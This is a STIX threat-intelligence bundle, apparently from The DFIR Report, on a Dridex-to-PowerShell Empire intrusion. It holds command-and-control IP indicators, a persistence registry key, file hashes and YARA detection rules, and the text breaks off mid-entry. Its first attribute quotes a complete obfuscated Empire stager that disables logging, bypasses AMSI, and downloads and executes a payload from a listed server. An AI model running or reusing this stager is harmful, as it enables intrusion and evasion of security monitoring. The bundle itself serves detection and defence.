{
"type" : "bundle" ,
"id" : "bundle--946e7701-5bdd-4efe-ae94-a6626fc8092b" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"name" : "The DFIR Report" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--946e7701-5bdd-4efe-ae94-a6626fc8092b" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"name" : "Dridex to Empire" ,
"published" : "2020-08-03T20:05:47Z" ,
"object_refs" : [
"x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541" ,
"indicator--39f56fa9-58f9-4962-a4e9-809182990f7d" ,
"indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af" ,
"indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268" ,
"indicator--ef331607-0a3d-4770-b9da-33708b3e1a10" ,
"indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3" ,
"indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0" ,
"indicator--587aa626-f57e-444e-b1c1-ab3491f99a10" ,
"indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2" ,
"indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1" ,
"indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4" ,
"indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6" ,
"indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92" ,
"indicator--c176ce15-acd2-4573-9991-8e19d4953c4f" ,
"indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30" ,
"indicator--931290f5-12fd-493e-802f-4e9e132a6a0d" ,
"indicator--80882b5d-a04b-4963-a324-e9778acbaec6" ,
"indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3" ,
"indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6" ,
"observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"indicator--be484895-ebf6-4a2d-b492-e8810cd8f793" ,
"indicator--46037d3e-727a-4508-8dcb-d10de58a764f" ,
"indicator--612fb261-eeee-4173-a89d-074aad7c64d2" ,
"indicator--513494bf-37dd-4704-a5ea-15155c29c4fc" ,
"indicator--22e9a211-22e7-45d2-9b39-33a01b5e9c69" ,
"indicator--7b2b9772-9059-4651-84e8-bc066e15b917" ,
"indicator--63b24626-a14c-4bf1-951d-fd726a7fdac2" ,
"indicator--9bb216ae-af15-4cba-9d65-40be296d9438" ,
"indicator--aec61910-1c29-47c5-88c9-37621ded62dd" ,
"indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7" ,
"indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2" ,
"x-misp-object--0537282b-b524-441b-bc04-7b894b342a40" ,
"x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6" ,
"x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239" ,
"x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786" ,
"x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff" ,
"x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31" ,
"x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867" ,
"x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251" ,
"x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2" ,
"x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f" ,
"x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c" ,
"x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1" ,
"x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0" ,
"x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218" ,
"x-misp-object--072b4d8e-b602-458e-9a96-71242a752828"
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"Dridex" ,
"Powershell Empire" ,
"misp-galaxy:tool=\"Dridex\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--22da835e-04f1-4e3d-9125-3dbbe3cb7541" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T19:55:43.000Z" ,
"modified" : "2020-07-15T19:55:43.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_type" : "text" ,
"x_misp_value" : "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--39f56fa9-58f9-4962-a4e9-809182990f7d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:32:15.000Z" ,
"modified" : "2020-07-15T20:32:15.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '194.99.22.145']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:32:15Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"kill-chain:Command and Control" ,
"Powershell Empire"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--acb0c1a9-45b9-4442-986b-d10c0b5808af" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:31:54.000Z" ,
"modified" : "2020-07-15T20:31:54.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '64.118.8.15']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:31:54Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--2b113678-6c5c-4f92-b747-5fcd46fb9268" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:31:49.000Z" ,
"modified" : "2020-07-15T20:31:49.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '59.148.253.194']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-15T20:31:49Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--ef331607-0a3d-4770-b9da-33708b3e1a10" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-21T02:21:32.000Z" ,
"modified" : "2020-07-21T02:21:32.000Z" ,
"pattern" : "[windows-registry-key:key = '\\\\HKEY_USERS\\\\S-1-5-21-1761595937-4212512506-1431507687-12106\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Zvhlxdonjwfvei']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-21T02:21:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Persistence mechanism"
}
] ,
"labels" : [
"misp:type=\"regkey\"" ,
"misp:category=\"Persistence mechanism\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--6593e1cf-db14-4c4d-a5e5-cda4d9e252e3" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-21T02:22:45.000Z" ,
"modified" : "2020-07-21T02:22:45.000Z" ,
"pattern" : "[file:name = '\\\\%APPDATA\\\\%\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\swET\\\\bdechangepin.exe']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-07-21T02:22:45Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload installation"
}
] ,
"labels" : [
"misp:type=\"filename\"" ,
"misp:category=\"Payload installation\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f9f88e60-774a-47dc-bbcc-09818cbf07a0" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:22.000Z" ,
"modified" : "2020-08-03T01:22:22.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.58.16.87']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:22Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--587aa626-f57e-444e-b1c1-ab3491f99a10" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:22.000Z" ,
"modified" : "2020-08-03T01:22:22.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.168.239.42']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:22Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3bbfd758-3b04-47ca-80c6-04566cd9f0e2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '216.52.109.40']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--da8a693e-6e63-4de8-a1ef-ef863052adb1" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.221.43']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--65837ca9-0bf6-4c22-92a4-72fde36d2cd4" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:21.000Z" ,
"modified" : "2020-08-03T01:22:21.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.131.103.128']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--cad4c1c8-ad81-4869-841d-fc5b5176d8d6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '54.39.34.24']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--64479ecc-ab45-495c-875d-42a2b7b2ce92" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '192.99.103.228']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--c176ce15-acd2-4573-9991-8e19d4953c4f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:22:20.000Z" ,
"modified" : "2020-08-03T01:22:20.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '2.80.178.251']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:22:20Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--e2ddf6c7-40b0-4a89-8751-7525d4693c30" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T01:20:19.000Z" ,
"modified" : "2020-08-03T01:20:19.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '75.170.61.45']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T01:20:19Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--931290f5-12fd-493e-802f-4e9e132a6a0d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:57.000Z" ,
"modified" : "2020-08-03T10:20:57.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '199.66.90.63']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:57Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--80882b5d-a04b-4963-a324-e9778acbaec6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:34.000Z" ,
"modified" : "2020-08-03T10:20:34.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '88.129.223.244']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--f1d301b8-3592-499e-b1b5-06c2d8e952d3" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T10:20:09.000Z" ,
"modified" : "2020-08-03T10:20:09.000Z" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '209.74.126.2']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T10:20:09Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\"" ,
"Dridex" ,
"kill-chain:Command and Control"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--984b5cd1-6311-49e9-b65f-d7c684bd28f6" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T20:04:33.000Z" ,
"modified" : "2020-08-03T20:04:33.000Z" ,
"pattern" : "[/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"<ms:script implements-prefix=\\\"user\\\" language=\\\"JScript\\\">\" fullword wide\r\n $s6 = \"]]> </ms:script>\" fullword wide\r\n $s7 = \"</ms:script>\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide
"pattern_type" : "yara" ,
"pattern_version" : "2.1" ,
"valid_from" : "2020-08-03T20:04:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"yara\"" ,
"misp:category=\"Artifacts dropped\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-03T12:30:56.000Z" ,
"modified" : "2020-08-03T12:30:56.000Z" ,
"first_observed" : "2020-08-03T12:30:56Z" ,
"last_observed" : "2020-08-03T12:30:56Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5938cc58-c427-4a29-808b-fcdfcd62ff7d"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5938cc58-c427-4a29-808b-fcdfcd62ff7d" ,
"value" : "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--be484895-ebf6-4a2d-b492-e8810cd8f793" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:09:07.000Z" ,
"modified" : "2020-07-15T20:09:07.000Z" ,
"pattern" : "[file:hashes.MD5 = '92cc8b22a89cc560963407b482443b76' AND file:hashes.SHA1 = '8b0c0b84222571a70ca65c0e3e8cf459c80406fc' AND file:hashes.SHA256 = '5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a' AND file:hashes.SHA512 = '2246f494a57b0cb1623c7eb0c7dc11ca8424ad166c99cf87c7528e425167297266cf7fe56d342756560d4e5de9b1ab2d989527b0581b79edf910519cbb973475' AND file:hashes.SSDEEP = '3072:toADcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESenxxgSrYGRQJSwrruPK:qA26hB5gBZ74XQN99enxxgShRW6i' AND file:name = 'ufo.exe' AND file:size = '217088' AND (file:content_ref.payload_bin = 